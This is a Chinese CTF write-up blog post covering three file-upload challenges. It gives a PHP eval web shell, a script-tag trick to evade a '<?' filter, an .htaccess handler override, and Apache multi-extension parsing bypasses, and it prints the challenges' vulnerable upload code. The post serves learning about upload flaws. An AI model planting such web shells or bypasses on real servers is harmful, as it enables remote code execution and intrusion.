<!DOCTYPE html>
<html lang="zh_CN">
    <head>
  <!-- 元数据 -->
  <meta charset="utf-8">
  
  
  <title>几个文件上传 | AceNyaRu</title>
  <meta name="author" content="amanokuya" />
  <meta http-equiv="Cache-Control" content="no-transform" />
  <meta http-equiv="Cache-Control" content="no-siteapp" />
  <meta http-equiv="X-UA-Compatible" content="IE=edge" />
  <meta name="robots" content="index,follow" />
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
  <meta name="format-detection" content="telphone=no, email=no" />
  
    <meta name="keywords" content="" />
  
  <meta name="description" content="[GXYCTF 2019]BabyUpload上传一个 &lt;?php @eval($_POST[&#39;cmd&#39;]);?&gt; 会被检测到&lt;??换一种方式 123&lt;script language&#x3D;&amp;#x27;php&amp;#x27;&gt; @eval($_POST[&amp;#x27;cmd&amp;#x27;]);&lt;&#x2F;script&gt; 上传成功，但是不能上传带’ph’的文件，上">
<meta property="og:type" content="article">
<meta property="og:title" content="几个文件上传">
<meta property="og:url" content="https://amanokuya.github.io/2023/11/30/%E5%87%A0%E4%B8%AA%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/index.html">
<meta property="og:site_name" content="AceNyaRu">
<meta property="og:description" content="[GXYCTF 2019]BabyUpload上传一个 &lt;?php @eval($_POST[&#39;cmd&#39;]);?&gt; 会被检测到&lt;??换一种方式 123&lt;script language&#x3D;&amp;#x27;php&amp;#x27;&gt; @eval($_POST[&amp;#x27;cmd&amp;#x27;]);&lt;&#x2F;script&gt; 上传成功，但是不能上传带’ph’的文件，上">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2023-11-30T12:43:24.000Z">
<meta property="article:modified_time" content="2023-11-30T14:10:32.644Z">
<meta property="article:author" content="amanokuya">
<meta name="twitter:card" content="summary">
  
  <!-- 站点验证相关 -->
  
    
    
    
  
  <!-- 样式表文件 -->
  <link rel="stylesheet" id="kratos-css" href="/css/kratosr.min.css" media="all"></script>
  
    <link rel="stylesheet" id="darkmode-css" href="/css/kr-color-dark.min.css" media="(prefers-color-scheme: dark)"></script>
    <script src="/js/kr-dark.min.js"></script>
  
  
    <link rel="stylesheet" id="highlight-css" href="/css/highlight/night-eighties.min.css" media="all"></script>
  
  
  <link rel="stylesheet" id="fontawe-css" href="/vendors/font-awesome@4.7.0/css/font-awesome.min.css" media="all"></script>
  <link rel="stylesheet" id="nprogress-css" href="/vendors/nprogress@0.2.0/nprogress.css" media="all"></script>
  
  
    <link rel="stylesheet" href="/vendors/aplayer@1.10.1/dist/APlayer.min.css"></script>
  
  
    <link rel="stylesheet" href="/vendors/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css"></script>
  
  <!-- 不得不预先加载的一些JS文件 -->
  <script src="/vendors/jquery@3.6.0/dist/jquery.min.js"></script>
  
    <script src="/vendors/qrcode_js@1.0.0/qrcode.min.js"></script>
  
  
  <style>
    
      .kratos-cover.kratos-cover-2 {
        background-image: url('/images/banner.webp');
      }
    
    
      @media(min-width:768px) {
        body.custom-background {
          background-image: url('/images/bg.webp');
        }
      }
    
  </style>
  
<meta name="generator" content="Hexo 6.3.0"></head>


    <body class="custom-background">
        <div id="kratos-wrapper">
    <div id="kratos-page">
        <div id="kratos-header">
            <header id="kratos-desktop-topnav" class="kratos-topnav">
                <div class="container">
                    <div class="nav-header">
                        <nav id="kratos-menu-wrap">
                            <ul id="kratos-primary-menu" class="sf-menu">
                                
                                    
                                    
                                
                            </ul>
                        </nav>
                    </div>
                </div>
            </header>
            <header id="kratos-mobile-topnav" class="kratos-topnav">
                <div class="container">
                    <div class="color-logo"><a href="/">AceNyaRu</a></div>
                    <div class="nav-toggle">
                        <a class="kratos-nav-toggle js-kratos-nav-toggle">
                            <i></i>
                        </a>
                    </div>
                </div>
            </header>
        </div>
        <div class="kratos-start kratos-hero-2">
            <!-- <div class="kratos-overlay"></div> -->
            <div class="kratos-cover kratos-cover-2 text-center">
                <div class="desc desc2 animate-box">
                    <a href="/">
                        <h2>AceNyaRu</h2> <br />
                        <span></span>
                    </a>
                </div>
            </div>
        </div>

        <div id="kratos-blog-post">
            <div class="container">
                <div id="main" class="row">
                    

        

            <section class="col-md-8">

        

            <article itemscope itemtype="https://schema.org/Article">
    
    <link itemprop="mainEntityOfPage" href="https://amanokuya.github.io/2023/11/30/%E5%87%A0%E4%B8%AA%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/">
    <div class="kratos-hentry kratos-post-inner clearfix">
        <header class="kratos-entry-header">
            
                <h1 class="kratos-entry-title text-center" itemprop="name headline">几个文件上传</h1>
            
            
            <ul class="kratos-post-meta text-center">
                <li><time datetime="2023-11-30T12:43:24.000Z" itemprop="datePublished"><i class="fa fa-calendar"></i> 2023-11-30</time></li>
                <li itemprop="author" itemscope itemtype="https://schema.org/Person">
                    <i class="fa fa-user"></i> 作者 <span itemprop="name">amanokuya</span>
                </li>
                <li>
                    <i class="fa fa-edit"></i> 
                    
                    
                        ~5.05K
                    
                    字
                </li>
                
            </ul>
        </header>
        <div class="kratos-post-content">
            
            <div id="expire-alert" class="alert alert-warning hidden" role="alert">
                <div class="icon"><i class="fa fa-warning"></i></div>
                <div class="text"><p>本文最后编辑于 <time datetime="1701353432644"></time> 前，其中的内容可能需要更新。</p></div>
            </div>
            
            
            <hr />
            <div itemprop="articleBody"><h3 id="GXYCTF-2019-BabyUpload"><a href="#GXYCTF-2019-BabyUpload" class="headerlink" title="[GXYCTF 2019]BabyUpload"></a>[GXYCTF 2019]BabyUpload</h3><p>上传一个 <code>&lt;?php @eval($_POST[&#39;cmd&#39;]);?&gt;</code> 会被检测到<code>&lt;?</code>?<br>换一种方式</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;script language=&#x27;php&#x27;&gt; </span><br><span class="line">@eval($_POST[&#x27;cmd&#x27;]);</span><br><span class="line">&lt;/script&gt;</span><br></pre></td></tr></table></figure>
<p>上传成功，但是不能上传带’ph’的文件，上传.htaccess文件将上传的.jpeg解析成.php</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;FilesMatch &#x27;cmd&#x27;&gt;  //刚才上传的文件叫cmd.php</span><br><span class="line">SetHandler application/x-http-php</span><br><span class="line">&lt;/FilesMatch&gt;</span><br></pre></td></tr></table></figure>
<p>蚁剑连接找flag即可, 或者<code>cmd=show_source(&#39;/flag&#39;)</code><br> 看一下<code>index.php</code><br> <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line"> &lt;?php</span><br><span class="line">session_start();</span><br><span class="line">echo &quot;&lt;meta http-equiv=\&quot;Content-Type\&quot; content=\&quot;text/html; charset=utf-8\&quot; /&gt; </span><br><span class="line">&lt;title&gt;Upload&lt;/title&gt;</span><br><span class="line">&lt;form action=\&quot;\&quot; method=\&quot;post\&quot; enctype=\&quot;multipart/form-data\&quot;&gt;</span><br><span class="line">上传文件&lt;input type=\&quot;file\&quot; name=\&quot;uploaded\&quot; /&gt;</span><br><span class="line">&lt;input type=\&quot;submit\&quot; name=\&quot;submit\&quot; value=\&quot;上传\&quot; /&gt;</span><br><span class="line">&lt;/form&gt;&quot;;</span><br><span class="line">error_reporting(0);</span><br><span class="line">if(!isset($_SESSION[&#x27;user&#x27;]))&#123;</span><br><span class="line">    $_SESSION[&#x27;user&#x27;] = md5((string)time() . (string)rand(100, 1000));</span><br><span class="line">&#125;</span><br><span class="line">if(isset($_FILES[&#x27;uploaded&#x27;])) &#123;</span><br><span class="line">    $target_path  = getcwd() . &quot;/upload/&quot; . md5($_SESSION[&#x27;user&#x27;]);</span><br><span class="line">    $t_path = $target_path . &quot;/&quot; . basename($_FILES[&#x27;uploaded&#x27;][&#x27;name&#x27;]);</span><br><span class="line">    $uploaded_name = $_FILES[&#x27;uploaded&#x27;][&#x27;name&#x27;];</span><br><span class="line">    $uploaded_ext  = substr($uploaded_name, strrpos($uploaded_name,&#x27;.&#x27;) + 1);</span><br><span class="line">    $uploaded_size = $_FILES[&#x27;uploaded&#x27;][&#x27;size&#x27;];</span><br><span class="line">    $uploaded_tmp  = $_FILES[&#x27;uploaded&#x27;][&#x27;tmp_name&#x27;];</span><br><span class="line"> </span><br><span class="line">    if(preg_match(&quot;/ph/i&quot;, strtolower($uploaded_ext)))&#123;</span><br><span class="line">        die(&quot;后缀名不能有ph！&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">    else&#123;</span><br><span class="line">        if ((($_FILES[&quot;uploaded&quot;][&quot;type&quot;] == &quot;</span><br><span class="line">            &quot;) || ($_FILES[&quot;uploaded&quot;][&quot;type&quot;] == &quot;image/jpeg&quot;) || ($_FILES[&quot;uploaded&quot;][&quot;type&quot;] == &quot;image/pjpeg&quot;)) &amp;&amp; ($_FILES[&quot;uploaded&quot;][&quot;size&quot;] &lt; 2048))&#123;</span><br><span class="line">            $content = file_get_contents($uploaded_tmp);</span><br><span class="line">            if(preg_match(&quot;/\&lt;\?/i&quot;, $content))&#123;</span><br><span class="line">                die(&quot;诶，别蒙我啊，这标志明显还是php啊&quot;);</span><br><span class="line">            &#125;</span><br><span class="line">            else&#123;</span><br><span class="line">                mkdir(iconv(&quot;UTF-8&quot;, &quot;GBK&quot;, $target_path), 0777, true);</span><br><span class="line">                move_uploaded_file($uploaded_tmp, $t_path);</span><br><span class="line">                echo &quot;&#123;$t_path&#125; succesfully uploaded!&quot;;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        else&#123;</span><br><span class="line">            die(&quot;上传类型也太露骨了吧！&quot;);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br><span class="line"></span><br></pre></td></tr></table></figure></p>
<h3 id="MoeCTF-2022-what-are-y0u-uploading"><a href="#MoeCTF-2022-what-are-y0u-uploading" class="headerlink" title="[MoeCTF 2022]what are y0u uploading"></a>[MoeCTF 2022]what are y0u uploading</h3><p>上传一个文件试试 <code>可恶的hacker！只能上传.png或.jpg或gif!</code><br>估计是上传允许的文件然后抓包修改<br>上传后修改后缀 <code>文件上传成功！filename：cmd.jpg 我不想要这个特洛伊文件，给我一个f1ag.php 我就给你flag!</code><br>把文件名修改成<code>&#39;f1ag.php&#39;</code> 上传获得flag<code>NSSCTF&#123;955c9fbb-3d87-422e-806a-18601f5b9b1d&#125;</code></p>
<h3 id="UUCTF-2022-新生赛-ez-upload"><a href="#UUCTF-2022-新生赛-ez-upload" class="headerlink" title="[UUCTF 2022 新生赛]ez_upload"></a>[UUCTF 2022 新生赛]ez_upload</h3><p>根据标签查了一下 apach 漏洞<br>apache 相关的解析漏洞有两个：<br>%0a (CVE-2017-15715)<br>未知后缀 test.php.xxx</p>
<p>首先尝试<code>/x0a</code> 但是还是被过滤了，可能也跟第一题一样检查了内容？<br>修改内容后还是不行，尝试下一个未知后缀漏洞 <code>1.php.jp</code>  上传成功<code>文件存储在: upload/cmd.php.</code><br>尝试蚁剑连接<br>apech是从右向左解析文件后缀，但是为什么<code>1.jp.php</code>能被解析成功，而<code>1.php.jp  1.jp.php.us</code>不能被解析？</p>
<p>(查了一下)[<a target="_blank" rel="noopener" href="https://blog.werner.wiki/file-resolution-vulnerability-apache/]">https://blog.werner.wiki/file-resolution-vulnerability-apache/]</a></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">那么aaa.php.xxx为何没有被作为php代码执行呢？我猜是这样的，当然只是我的猜测，实在是找不到相关资料，只好猜了。</span><br><span class="line">Apache看到文件aaa.php.xxx，按照多后缀名的解析规则，认为该文件是php程序文件，把该文件作为php程序文件处理。怎么处理呢？交给php解释器，Apache本身并不懂php。</span><br><span class="line">而php解释器却有着和Apache不同的后缀解析规则，可能只认最后一个后缀，故而认为aaa.php.xxx不是php程序文件，拒绝执行。在我的测试环境中，php以模块（module）的模式工作于Apache的领导下。这种模式下php接受到领导Apache分配的任务——aaa.php.xxx，一看，不是php程序文件，没法执行，但也没有报错，而是返回了文件内容本身。</span><br><span class="line">php还可以以FASTCGI的模式工作于Apache中，此种模式下php遇到类似aaa.php.xxx这种不是php程序的文件，会触发500错误。</span><br></pre></td></tr></table></figure>

<p>附上upload.php</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">//echo $_FILES[&#x27;file&#x27;][&#x27;name&#x27;];echo &#x27;&lt;br&gt;&#x27;;</span><br><span class="line">//echo $_FILES[&#x27;file&#x27;][&#x27;type&#x27;];echo &#x27;&lt;br&gt;&#x27;;</span><br><span class="line">$flag1=true;</span><br><span class="line">$flag2=true;</span><br><span class="line">$file_name=$_FILES[&#x27;file&#x27;][&#x27;name&#x27;];</span><br><span class="line">$file_type=$_FILES[&#x27;file&#x27;][&#x27;type&#x27;];</span><br><span class="line">$allow_file_type=[&#x27;image/jpeg&#x27;,&#x27;image/png&#x27;];</span><br><span class="line">$allowedExts = array(&quot;php&quot;, &quot;php3&quot;, &quot;php5&quot;, &quot;phtml&quot;,&quot;htaccess&quot;);</span><br><span class="line">$ext=substr($file_name,strpos($file_name,&quot;.&quot;)+1);</span><br><span class="line">if(!in_array(strtolower($file_type),$allow_file_type))&#123;</span><br><span class="line">    $flag1=false;</span><br><span class="line">    die(&quot;你好坏哦，不理你了&quot;);</span><br><span class="line">&#125;</span><br><span class="line">if(in_array(strtolower($ext),$allowedExts))&#123;</span><br><span class="line">    $flag2=false;</span><br><span class="line">    die(&quot;你好坏哦，不理你了&quot;);</span><br><span class="line">&#125;</span><br><span class="line">if($flag1&amp;&amp;$flag2)&#123;</span><br><span class="line">    if (file_exists(&quot;upload/&quot; . $_FILES[&quot;file&quot;][&quot;name&quot;]))</span><br><span class="line">    &#123;</span><br><span class="line">        echo $_FILES[&quot;file&quot;][&quot;name&quot;] . &quot; 文件已经存在。 &quot;;</span><br><span class="line">    &#125;</span><br><span class="line">    else</span><br><span class="line">    &#123;</span><br><span class="line">        // 如果 upload 目录不存在该文件则将文件上传到 upload 目录下</span><br><span class="line">        move_uploaded_file($_FILES[&quot;file&quot;][&quot;tmp_name&quot;], &quot;upload/&quot; . $_FILES[&quot;file&quot;][&quot;name&quot;]);</span><br><span class="line">        echo &quot;文件存储在: &quot; . &quot;upload/&quot; . $_FILES[&quot;file&quot;][&quot;name&quot;];</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">else&#123;</span><br><span class="line">    echo &quot;Hacker，你好坏哟&quot;;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure></div>
        </div>
        
            <div class="kratos-copyright text-center clearfix">
                <h5 itemprop="copyrightNotice">本作品采用 <a rel="license nofollow" target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/">知识共享署名-相同方式共享 4.0 国际许可协议</a> 进行许可</h5>
            </div>
        
        <footer class="kratos-entry-footer clearfix">
            
                <div class="post-like-donate text-center clearfix" id="post-like-donate">
                
                
                    <a class="share" href="javascript:;"><i class="fa fa-share-alt"></i> 分享</a>
                    <div class="share-wrap" style="display: none;">
    <div class="share-group">
        <a href="javascript:;" class="share-plain qq" onclick="share('qq');" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-qq"></i>
            </div>
        </a>
        <a href="javascript:;" class="share-plain qzone" onclick="share('qzone');" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-star"></i>
            </div>
        </a>
        <a href="javascript:;" class="share-plain weixin pop style-plain" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-weixin"></i>
            </div>
            <div class="share-int">
                <div class="qrcode" id="wechat-qr"></div>
                <p>打开微信“扫一扫”，打开网页后点击屏幕右上角分享按钮</p>
            </div>
        </a>
        <a href="javascript:;" class="share-plain weibo" onclick="share('weibo');" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-weibo"></i>
            </div>
        </a>
        <a href="javascript:;" class="share-plain facebook style-plain" onclick="share('facebook');" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-facebook"></i>
            </div>
        </a>
        <a href="javascript:;" class="share-plain twitter style-plain" onclick="share('twitter');" rel="nofollow">
            <div class="icon-wrap">
                <i class="fa fa-twitter"></i>
            </div>
        </a>
    </div>
    <script type="text/javascript">
        $(()=>{
            new QRCode("wechat-qr", {
                text: "https://amanokuya.github.io/2023/11/30/%E5%87%A0%E4%B8%AA%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/",
                width: 150,
                height: 150,
                correctLevel : QRCode.CorrectLevel.H
            });
        });
        function share(dest) {
            const qqBase        = "https://connect.qq.com/widget/shareqq/index.html?";
            const weiboBase     = "https://service.weibo.com/share/share.php?";
            const qzoneBase     = "https://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?";
            const facebookBase  = "https://www.facebook.com/sharer/sharer.php?";
            const twitterBase   = "https://twitter.com/intent/tweet?";
            const hostUrl       = "https://amanokuya.github.io/2023/11/30/%E5%87%A0%E4%B8%AA%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/";
            const title         = "「几个文件上传」";
            const excerpt       = `[GXYCTF 2019]BabyUpload上传一个 &lt;?php @eval($_POST[&#39;cmd&#39;]);?&gt; 会被检测到&lt;??换一种方式
123&lt;script language=&#x27...`;
            let _URL;
            switch (dest) {
                case "qq"       : _URL = qqBase+"url="+hostUrl+"&title="+title+"&desc=&summary="+excerpt+"&site=cxpy";     break;
                case "weibo"    : _URL = weiboBase+"url="+hostUrl+"&title="+title+excerpt;                                 break;
                case "qzone"    : _URL = qzoneBase+"url="+hostUrl+"&title="+title+"&desc=&summary="+excerpt+"&site=cxpy";  break;
                case "facebook" : _URL = facebookBase+"u="+hostUrl;                                                        break;
                case "twitter"  : _URL = twitterBase+"text="+title+excerpt+"&url="+hostUrl;                                break;
            }
            window.open(_URL);
        };
    </script>
</div>
                
                </div>
            
            <div class="footer-tag clearfix">
                <div class="pull-left">
                <i class="fa fa-tags"></i>
                    
                </div>
                <div class="pull-date">
                    <time datetime="2023-11-30T14:10:32.644Z" itemprop="dateModified">最后编辑：2023-11-30</time>
                </div>
            </div>
        </footer>
    </div>
    
        <nav class="navigation post-navigation clearfix" role="navigation">
            
            <div class="nav-previous clearfix">
                <a title=" 最佳适应算法" href="/2023/11/26/最佳适应算法/">&lt; 上一篇</a>
            </div>
            
            
        </nav>
    
    
</article>

        

            </section>

        

                
            

<section id="kratos-widget-area" class="col-md-4 hidden-xs hidden-sm">
    <!-- 文章和页面根据splitter来分割，没有的话就从头开始设置为sticky -->
    
    
                <aside id="krw-about" class="widget widget-kratos-about clearfix">
    <div class="photo-background"></div>
    <div class="photo-wrapper clearfix">
        <div class="photo-wrapper-tip text-center">
            <img class="about-photo" src="/images/avatar.webp" loading="lazy" decoding="auto" />
        </div>
    </div>
    <div class="textwidget">
        <p class="text-center"></p>
    </div>
    <div class="site-meta">
        <a class="meta-item" href="/archives/">
            <span class="title">
                文章
            </span>
            <span class="count">
                27
            </span>
        </a>
        <a class="meta-item" href="/categories/">
            <span class="title">
                分类
            </span>
            <span class="count">
                0
            </span>
        </a>
        <a class="meta-item" href="/tags/">
            <span class="title">
                标签
            </span>
            <span class="count">
                4
            </span>
        </a>
    </div>
</aside>
            
                    <div class="sticky-area">
                
                

            
                
  <aside id="krw-tags" class="widget widget-kratos-tags clearfix">
    <h4 class="widget-title"><i class="fa fa-tags"></i>标签聚合</h4>
      <div class="tag-clouds">
        <a href="/tags/C/" style="font-size: 0.6em;">C</a> <a href="/tags/HTML/" style="font-size: 0.8em;">HTML</a> <a href="/tags/PHP/" style="font-size: 0.8em;">PHP</a> <a href="/tags/sqlilab/" style="font-size: 0.8em;">sqlilab</a>
      </div>
  </aside>

            
                
  <aside id="krw-posts" class="widget widget-kratos-posts">
  <h4 class="widget-title"><i class="fa fa-file"></i>最新文章</h4>
  <div class="tab-content">
      <ul class="list-group">
        
        
          
          
            <a class="list-group-item" href="/2023/11/30/%E5%87%A0%E4%B8%AA%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/"><i class="fa  fa-book"></i> 几个文件上传</a>
            
          
        
          
          
            <a class="list-group-item" href="/2023/11/26/%E6%9C%80%E4%BD%B3%E9%80%82%E5%BA%94%E7%AE%97%E6%B3%95/"><i class="fa  fa-book"></i> 最佳适应算法</a>
            
          
        
          
          
            <a class="list-group-item" href="/2023/10/29/ARP%E6%AC%BA%E9%AA%97/"><i class="fa  fa-book"></i> ARP欺骗</a>
            
          
        
          
          
            <a class="list-group-item" href="/2023/09/13/%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/"><i class="fa  fa-book"></i> 报错注入</a>
            
          
        
          
          
            <a class="list-group-item" href="/2023/09/11/BJDCTF-2020/"><i class="fa  fa-book"></i> BJDCTF 2020</a>
            
          
        
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
          
            
      </ul>
  </div>
  </aside>

            
    </div>
</section>
        
        </div>
    </div>
</div>
<footer>
    <div id="footer"  class="ap-lrc"  >
        <div class="container">
            <div class="row">
                <div class="col-md-6 col-md-offset-3 footer-list text-center">
                    <ul class="kratos-social-icons">
                        
                        
                        <li><a target="_blank" rel="nofollow" href="https://t.me/CandyUnion"><i class="fa fa-telegram"></i></a></li>
                        
                        
                        
                        <li><a target="_blank" rel="me" href="https://nya.one/@Candinya"><i class="fa fa fa-share-alt-square"></i></a></li>
                        <li><a target="_blank" rel="nofollow" href="https://github.com/Candinya"><i class="fa fa-github"></i></a></li>
                        
                    </ul>
                    <ul class="kratos-copyright">
                        <div>
                            <li>&copy; 2023 AceNyaRu 版权所有.</li>
                            <li>本站已运行<span id="span_dt">Loading...</span></li>
                        </div>
                        <div>
                            <li>Theme <a href="https://github.com/Candinya/Kratos-Rebirth" target="_blank">Kratos:Rebirth</a></li>
                            <li>Site built with&nbsp;<i class="fa fa-heart throb" style="color:#d43f57"></i>&nbsp;by amanokuya.</li>
                        </div>
                        <div>
                            <li>Powered by <a href="https://hexo.io" target="_blank" rel="nofollow">Hexo</a></li>
                            <li>Hosted on <a href="https://github.io" target="_blank">Github Pages</a></li>
                        </div>
                        <div>
                            
                            
                        </div>
                    </ul>
                </div>
            </div>
        </div>
        <div class="kr-tool text-center">
            <div class="tool">
                
                    <div class="box search-box">
                        <a href="/search/">
                            <span class="fa fa-search"></span>
                        </a>
                    </div>
                
                
                    <div class="box theme-box" id="darkmode-switch">
                        <span class="fa fa-adjust"></span>
                    </div>
                
                
            </div>
            <div class="box gotop-box">
                <span class="fa fa-chevron-up"></span>
            </div>
        </div>
    </div>
</footer>
</div>
</div>

        <script defer src="/vendors/bootstrap@3.3.4/dist/js/bootstrap.min.js"></script>
<script defer src="/vendors/nprogress@0.2.0/nprogress.js"></script>
<script>
    if (!window.kr) {
        window.kr = {};
    }
    window.kr.notMobile = (!(navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i)));
    window.kr.siteRoot = "/";
</script>


    <script async src="/js/candy.min.js"></script>



    <script defer src="/vendors/aplayer@1.10.1/dist/APlayer.min.js"></script>
    
    <script defer src="/vendors/meting@2.0.1/dist/Meting.min.js"></script>
    <meting-js
        server="netease"
        type="playlist"
        id="3204190542"
        order="random"
        fixed="true"
    >
    </meting-js>



    <script defer src="/vendors/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js"></script>

<script defer src="/vendors/clipboard@2.0.6/dist/clipboard.min.js"></script>
<script defer src="/js/kratosr.min.js"></script>
<script defer src="/js/pjax.min.js"></script>



<!-- Extra support for third-party plguins  -->


    </body>
</html>